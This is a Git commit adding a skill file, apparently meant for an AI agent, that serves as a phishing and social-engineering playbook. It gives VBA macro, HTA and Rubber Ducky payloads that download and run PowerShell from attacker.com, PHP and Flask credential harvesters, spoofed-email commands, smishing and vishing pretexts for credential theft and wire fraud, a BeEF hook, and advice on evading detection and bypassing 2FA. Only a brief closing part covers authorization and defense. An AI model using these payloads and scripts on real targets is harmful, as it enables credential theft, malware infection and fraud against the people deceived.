zhongwei/gh-trilwu-secskills-secskills
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Initial commit

Browse Source
This commit is contained in:
Zhongwei Li
2025-11-30 09:03:09 +08:00
commit 33a29e697a
25 changed files with 10078 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

427
skills/phishing-social-engineering/SKILL.md Normal file
View File

@@ -0,0 +1,427 @@
---
name: performing-social-engineering
description: Conduct phishing campaigns, credential harvesting, pretexting, and social engineering attacks using tools like Gophish, SET, and custom techniques. Use when performing social engineering assessments or red team engagements.
---
# Performing Social Engineering
## When to Use
- Phishing campaign execution
- Credential harvesting operations
- Social engineering assessments
- Red team engagements
- Security awareness testing
## Phishing Infrastructure
### Gophish (Phishing Framework)
```bash
# Install
wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
unzip gophish-v0.12.1-linux-64bit.zip
chmod +x gophish
./gophish
# Access web interface
https://localhost:3333
# Default: admin:gophish
```
**Gophish Campaign Setup:**
1. **Email Templates** - Create convincing phishing emails
2. **Landing Pages** - Clone legitimate sites for credential harvesting
3. **Sending Profiles** - Configure SMTP server
4. **Groups** - Import target user lists
5. **Campaign** - Combine all elements and launch
### SET (Social Engineering Toolkit)
```bash
# Launch SET
setoolkit
# Common modules:
# 1) Social-Engineering Attacks
# 1) Spear-Phishing Attack Vectors
# 2) Website Attack Vectors
# 3) Credential Harvester Attack Method
```
**Credential Harvester:**
```bash
# SET Menu:
# 1 -> 2 -> 3 (Credential Harvester)
# Choose site template or custom URL
# Enter attacker IP
# Hosts fake login page
# Captures credentials when submitted
```
## Email Phishing
### Email Spoofing
```bash
# sendEmail (simple SMTP client)
sendEmail -f ceo@company.com \
-t target@company.com \
-u "Urgent: Password Reset Required" \
-m "Click here to reset: http://evil.com/reset" \
-s smtp.server.com:25
# swaks (SMTP testing tool)
swaks --to target@company.com \
--from ceo@company.com \
--header "Subject: Important Update" \
--body "Please review: http://evil.com" \
--server smtp.company.com
```
### Attachment-Based Phishing
**Malicious Office Macros:**
```vba
' Excel/Word VBA macro
Sub AutoOpen()
Shell "powershell -nop -w hidden -c ""IEX((new-object net.webclient).downloadstring('http://attacker.com/payload.ps1'))"""
End Sub
```
**Malicious PDF:**
```bash
# Create PDF with embedded JavaScript
# Use tools like:
# - metasploit (exploit/windows/fileformat/adobe_pdf_embedded_exe)
# - PDFtk
# - malicious JavaScript injection
```
**Malicious HTA:**
```html
<!-- malicious.hta -->
<html>
<head>
<script language="VBScript">
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
window.close()
</script>
</head>
</html>
```
### Clone Legitimate Sites
```bash
# HTTrack website copier
httrack http://legitimate-site.com -O ./cloned_site/
# wget mirror
wget --mirror --convert-links --adjust-extension --page-requisites --no-parent http://legitimate-site.com
# Manual with curl
curl -o index.html http://legitimate-site.com/login
# Modify form action to send credentials to attacker
<form action="http://attacker.com/harvest.php" method="POST">
```
### Credential Harvesting Server
**Simple PHP Harvester:**
```php
<?php
// harvest.php
$file = 'credentials.txt';
$username = $_POST['username'];
$password = $_POST['password'];
$data = "User: $username | Pass: $password | IP: " . $_SERVER['REMOTE_ADDR'] . " | " . date('Y-m-d H:i:s') . "\n";
file_put_contents($file, $data, FILE_APPEND);
// Redirect to real site
header('Location: https://real-site.com');
?>
```
**Python Flask Harvester:**
```python
from flask import Flask, request, redirect
app = Flask(__name__)
@app.route('/login', methods=['POST'])
def harvest():
with open('creds.txt', 'a') as f:
f.write(f"User: {request.form['username']}, Pass: {request.form['password']}\n")
return redirect('https://real-site.com')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
```
## Voice Phishing (Vishing)
### SpoofCard/Caller ID Spoofing
- Services to spoof caller ID
- Impersonate IT support, executives, vendors
- Social engineering over phone
**Common Pretexts:**
- IT support needing to verify credentials
- HR department verifying personal information
- Finance department confirming wire transfer
- Vendor requiring payment information update
## SMS Phishing (Smishing)
```bash
# Send SMS with link
# Use services or tools like:
# - Twilio API
# - SMS gateways
# - SIM card with AT commands
# Example pretext:
"Your package delivery failed. Track here: http://evil.com/track"
"Your account has been locked. Reset here: http://evil.com/unlock"
"You've won a prize! Claim here: http://evil.com/claim"
```
## USB Drop Attacks
### Rubber Ducky / Bad USB
**Ducky Script Example:**
```
REM Open PowerShell and download payload
DELAY 2000
GUI r
DELAY 500
STRING powershell -w hidden
ENTER
DELAY 1000
STRING IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')
ENTER
```
**Bash Bunny:**
```bash
# Payloads at /payloads/switch1/
# Example: exfiltrate files, run payload, etc.
```
### Physical USB Drops
**Pretexts:**
- "Company Financial Data 2024"
- "Salary Information - Confidential"
- "Employee Bonuses Q4"
- "IT Security Update - Required"
**Payload Ideas:**
- Reverse shell
- Credential stealer
- Keylogger
- Data exfiltration
- Persistence mechanisms
## QR Code Phishing
```bash
# Generate QR code pointing to phishing site
qrencode -o evil_qr.png "http://evil.com/harvest"
# Print and place in physical locations:
# - "Scan for Free WiFi"
# - "Employee Portal Access"
# - "Building Directory"
```
## Watering Hole Attacks
1. **Identify** target organization's commonly visited sites
2. **Compromise** the website (or create lookalike)
3. **Inject** malicious code (exploit or profiling)
4. **Wait** for targets to visit and get compromised
## Browser-Based Attacks
### BeEF (Browser Exploitation Framework)
```bash
# Start BeEF
./beef
# Hook browsers with:
<script src="http://attacker-ip:3000/hook.js"></script>
# Access UI
http://127.0.0.1:3000/ui/panel
# Default: beef:beef
# Commands:
# - Social Engineering (fake notifications)
# - Browser exploitation
# - Network discovery
# - Credential harvesting
```
### Fake Update Pages
```html
<!-- fake-update.html -->
<html>
<head><title>Critical Browser Update Required</title></head>
<body>
<h1>Your browser is out of date!</h1>
<p>Click here to download the latest security update.</p>
<a href="http://attacker.com/malware.exe">Download Update</a>
</body>
</html>
```
## Pretexting Scenarios
**IT Support:**
- "Hi, this is John from IT. We're doing routine password resets..."
- "We've detected suspicious activity on your account..."
- "Your VPN certificate is expiring, we need to update it..."
**Executive Impersonation:**
- "This is [CEO name], I'm in a meeting and need you to..."
- "Urgent: Wire transfer needed before end of day..."
- "I'm traveling and can't access my account, can you help me..."
**Vendor/Partner:**
- "This is accounting from [vendor]. We need to update payment information..."
- "Your invoice is past due, please update billing details..."
**Delivery/Shipping:**
- "Package delivery failed, verify address..."
- "Customs clearance required, pay fee at..."
## LinkedIn/Social Media Reconnaissance
```bash
# Gather employee information
# - Job titles
# - Organizational structure
# - Technologies used
# - Recent activities/projects
# Tools:
# - theHarvester
# - linkedin2username
# - hunter.io (email patterns)
# Use for:
# - Targeted phishing
# - Pretexting scenarios
# - Impersonation attacks
```
## Payload Delivery Methods
**Links:**
- Shortened URLs (bit.ly, tinyurl)
- Typosquatting domains
- Homograph attacks (IDN homograph)
- URL obfuscation
**Attachments:**
- Office documents with macros (.docm, .xlsm)
- PDFs with exploits/JavaScript
- Compressed files (.zip, .rar)
- ISO/IMG files
- LNK files (shortcut tricks)
**Advanced:**
- HTML smuggling
- Polyglot files
- Password-protected archives (bypass AV)
- Signed malware (stolen/fake certificates)
## Tracking and Reporting
**Email Tracking:**
```html
<!-- Invisible tracking pixel -->
<img src="http://attacker.com/track?id=USER123" width="1" height="1" style="display:none">
```
**Link Tracking:**
```bash
# Unique URL per target
http://attacker.com/click?id=USER123
# Log access in server
```
**Metrics to Track:**
- Emails sent
- Emails opened (tracking pixel)
- Links clicked
- Credentials submitted
- Attachments opened
- Time to first click/submission
## OpSec Considerations
**Infrastructure:**
- Use disposable domains
- HTTPS for credential harvesting
- Legitimate SSL certificates (Let's Encrypt)
- Categorize domains (submit to categorization services)
- CDN for hosting (CloudFlare)
**Email:**
- SPF/DKIM/DMARC alignment
- Warm up email reputation
- Similar but different domains (company.com vs company-portal.com)
- Avoid spam trigger words
**Detection Avoidance:**
- Realistic sender names and addresses
- Professional email content
- Avoid known malicious indicators
- Time-based delivery (business hours)
- Geofencing (target geography only)
## Tools Summary
- **Gophish** - Phishing campaign management
- **SET** - Social Engineering Toolkit
- **BeEF** - Browser exploitation
- **King Phisher** - Phishing campaign toolkit
- **Evilginx2** - MITM phishing proxy (bypass 2FA)
- **Modlishka** - Reverse proxy phishing
- **CredSniper** - 2FA token capture
- **ShellPhish** - Automated phishing
## Defensive Awareness
Teach users to recognize:
- Urgency/pressure tactics
- Requests for credentials
- Unusual senders
- Suspicious links/attachments
- Too-good-to-be-true offers
- Requests to bypass security
## Legal and Ethical Considerations
- **Always have written authorization**
- Define scope clearly
- Protect harvested data
- Follow ROE (Rules of Engagement)
- Report findings responsibly
- Delete data after engagement
## References
- https://book.hacktricks.xyz/generic-methodologies-and-resources/phishing-methodology
- https://getgophish.com/
- https://github.com/trustedsec/social-engineer-toolkit
- https://www.social-engineer.org/